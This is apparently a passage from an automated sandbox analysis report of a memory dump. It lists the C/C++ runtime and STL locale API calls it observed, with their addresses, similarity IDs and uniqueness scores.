                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype$LocinfoLocinfo::~_collate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1155191899-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 6F09B2E8
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA15
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA27
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA39
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA4B
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA5D
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA6F
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA81
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA93
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAA5
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAB7
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAC9
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CADB
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAED
                                                                                                            • _free.LIBCMT ref: 6F09B2DD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09B2FF
                                                                                                            • _free.LIBCMT ref: 6F09B314
                                                                                                            • _free.LIBCMT ref: 6F09B31F
                                                                                                            • _free.LIBCMT ref: 6F09B341
                                                                                                            • _free.LIBCMT ref: 6F09B354
                                                                                                            • _free.LIBCMT ref: 6F09B362
                                                                                                            • _free.LIBCMT ref: 6F09B36D
                                                                                                            • _free.LIBCMT ref: 6F09B3A5
                                                                                                            • _free.LIBCMT ref: 6F09B3AC
                                                                                                            • _free.LIBCMT ref: 6F09B3C9
                                                                                                            • _free.LIBCMT ref: 6F09B3E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0577D4
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0577DE
                                                                                                            • int.LIBCPMT ref: 6F0577F5
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057818
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05782F
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F05784F
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05785C
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057869
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057873
                                                                                                            • int.LIBCPMT ref: 6F05788A
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0578E4
                                                                                                              • Part of subcall function 6F0599EC: __EH_prolog3.LIBCMT ref: 6F0599F3
                                                                                                              • Part of subcall function 6F0599EC: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F059A46
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0578C4
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0578F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$LocinfoLocinfo::~_moneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 478446508-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057A28
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057A32
                                                                                                            • int.LIBCPMT ref: 6F057A49
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057A83
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057AA3
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057AB0
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057ABD
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057AC7
                                                                                                            • int.LIBCPMT ref: 6F057ADE
                                                                                                            • numpunct.LIBCPMT ref: 6F057B01
                                                                                                              • Part of subcall function 6F059B8C: __EH_prolog3.LIBCMT ref: 6F059B93
                                                                                                              • Part of subcall function 6F059B8C: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F059BF9
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057B18
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057B38
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057B45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$LocinfoLocinfo::~_numpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3789072155-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0578FE
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057908
                                                                                                            • int.LIBCPMT ref: 6F05791F
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057959
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057979
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057986
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057993
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05799D
                                                                                                            • int.LIBCPMT ref: 6F0579B4
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057A0E
                                                                                                              • Part of subcall function 6F059ABC: __EH_prolog3.LIBCMT ref: 6F059AC3
                                                                                                              • Part of subcall function 6F059ABC: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F059B16
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0579EE
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057A1B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register$LocinfoLocinfo::~_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3810176953-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • _free.LIBCMT ref: 6F0932BF
                                                                                                            • _free.LIBCMT ref: 6F0932D8
                                                                                                            • _free.LIBCMT ref: 6F093316
                                                                                                            • _free.LIBCMT ref: 6F09331F
                                                                                                            • _free.LIBCMT ref: 6F09332B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorLast
                                                                                                            • String ID: C
                                                                                                            • API String ID: 3291180501-1037565863
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065688
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065692
                                                                                                            • int.LIBCPMT ref: 6F0656A9
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0656E3
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065703
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065710
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06571D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 3920336645-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057DA6
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057DB0
                                                                                                            • int.LIBCPMT ref: 6F057DC7
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057E01
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057E21
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057E2E
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057E3B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 3920336645-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 6F09D196: _free.LIBCMT ref: 6F09D1BB
                                                                                                            • _free.LIBCMT ref: 6F09D4F9
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09D504
                                                                                                            • _free.LIBCMT ref: 6F09D50F
                                                                                                            • _free.LIBCMT ref: 6F09D563
                                                                                                            • _free.LIBCMT ref: 6F09D56E
                                                                                                            • _free.LIBCMT ref: 6F09D579
                                                                                                            • _free.LIBCMT ref: 6F09D584
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F056F19
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F056F23
                                                                                                            • int.LIBCPMT ref: 6F056F3A
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • codecvt.LIBCPMT ref: 6F056F5D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F056F74
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F056F94
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F056FA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                            • String ID:
                                                                                                            • API String ID: 2133458128-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05773F
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057749
                                                                                                            • int.LIBCPMT ref: 6F057760
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057783
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F05779A
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0577BA
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0577C7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057615
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05761F
                                                                                                            • int.LIBCPMT ref: 6F057636
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F057659
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057670
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057690
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F05769D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0576AA
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0576B4
                                                                                                            • int.LIBCPMT ref: 6F0576CB
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F0576EE
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057705
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057725
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057732
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06555E
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065568
                                                                                                            • int.LIBCPMT ref: 6F06557F
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F0655A2
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0655B9
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0655D9
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0655E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0654C9
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0654D3
                                                                                                            • int.LIBCPMT ref: 6F0654EA
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • moneypunct.LIBCPMT ref: 6F06550D
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065524
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065544
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065551
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3376033448-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F06530A
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F065314
                                                                                                            • int.LIBCPMT ref: 6F06532B
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F06534E
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F065365
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F065385
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F065392
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05732C
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057336
                                                                                                            • int.LIBCPMT ref: 6F05734D
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • messages.LIBCPMT ref: 6F057370
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057387
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0573A7
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0573B4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                            • String ID:
                                                                                                            • API String ID: 958335874-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057B52
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057B5C
                                                                                                            • int.LIBCPMT ref: 6F057B73
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • numpunct.LIBCPMT ref: 6F057B96
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057BAD
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057BCD
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057BDA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 3064348918-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065275
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06527F
                                                                                                            • int.LIBCPMT ref: 6F065296
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • collate.LIBCPMT ref: 6F0652B9
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0652D0
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0652F0
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F0652FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1767075461-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Allocate$Max_value
                                                                                                            • String ID:
                                                                                                            • API String ID: 4124748770-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 6F05E172
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1DB
                                                                                                            • _Maklocstr.LIBCPMT ref: 6F05E1ED
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E205
                                                                                                            • _Maklocchr.LIBCPMT ref: 6F05E215
                                                                                                            • _Getvals.LIBCPMT ref: 6F05E237
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568BB
                                                                                                              • Part of subcall function 6F05688C: _Maklocchr.LIBCPMT ref: 6F0568D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3549167292-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057D11
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F057D1B
                                                                                                            • int.LIBCPMT ref: 6F057D32
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F057D6C
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F057D8C
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057D99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F057580
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F05758A
                                                                                                            • int.LIBCPMT ref: 6F0575A1
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F0575DB
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F0575FB
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F057608
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F0655F3
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F0655FD
                                                                                                            • int.LIBCPMT ref: 6F065614
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6F06564E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6F06566E
                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 6F06567B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.632904593.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                            • String ID:
                                                                                                            • API String ID: 55977855-0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F065434
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F06543E
                                                                                                            • int.LIBCPMT ref: 6F065455
